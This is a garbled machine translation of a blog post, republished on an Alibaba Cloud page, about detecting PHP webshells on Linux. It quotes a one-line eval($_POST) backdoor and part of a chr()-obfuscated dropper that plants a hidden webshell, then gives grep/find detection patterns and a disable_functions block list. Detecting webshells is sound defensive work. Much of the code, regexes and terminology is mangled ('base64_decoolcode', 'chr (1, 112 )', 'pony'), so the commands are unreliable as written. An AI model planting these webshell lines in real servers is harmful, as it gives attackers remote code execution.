In linux, find webshell and first get to know the pony. generally, it is easy to expose the Trojan horse. hackers will leave a hand to add the pony to the normal PHP file & lt ;? Phpeval ($ _ POST [a]);? & Gt; // password is a. Use a Chinese kitchen knife to connect to the hidden pony fputs (fopen (chr (46 ). chr (47 ). chr (9... find webshell in linux. First, you need to know the pony. generally, it is easy to expose the Trojan horse. hackers will leave a hand to add the pony to the normal PHP file. // The password is a. use the Chinese kitchen knife to connect to the hidden pony fputs (fopen (chr (46 ). chr (47 ). chr (97 ). chr (46 ). chr (1, 112 ). chr (1, 104 ). chr (112), w), chr (60 ). chr (63 ). chr (1, 112 ). chr (1, 104 ). chr (1, 112 ). chr (32 ). chr (1, 101 ). chr (1, 118 ). chr (97 ). chr (1, 108 ). chr (40 ).... Omitted decoding: the number in the chr brackets is the American information exchange standard code. for the abbreviation, ASCII can be used to find a comparison table, for example, 46. 47 is/32 is a space, which can be solved by echo chr (46 ). In WINDOWS, there should be a lot of log analysis and killing tools (rarely use WIN to indicate that they cannot be used as an example). how can we find webshells in LINUX? 1 find/www/-name "*. php "| xargs egrep 'assert | phpspy | c99sh | milw0rm | eval | \ (gunerpress | \ (base64_decoolcode | spider_bc | shell_exec | passthru | \] \ (\ $ \ _ \ \ [| eval \ (str_rot13 '>/opt/www. log & then manually view and write the scheduled task. Only the pony can be 1 grep-r -- include = *. php '[^ a-z] eval ($ _ post'.> post.txt 2 grep-r -- include = *. php '[^ a-z] eval ($ _ REQUEST'.> REQUEST.txt is found. it is important to analyze the logs and view the intrusion source. Prevention: disable dangerous functions and organize permissions to prevent excessive permissions. 1disable_functions = exec, scandir, shell_exec, phpinfo, eval, passthru, system, chroot, chgrp, chown, proc_open, proc_get_status, ini_alter, ini_restore, dl, openlog, syslog, readlink, s2ymlink, popepassthru, stream_socket_server, and fsocket git only need two shelldetect files. php // default account password admin protect shelldetect. if you have any good suggestions for db, thank you for sharing: PS: shell rebound
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.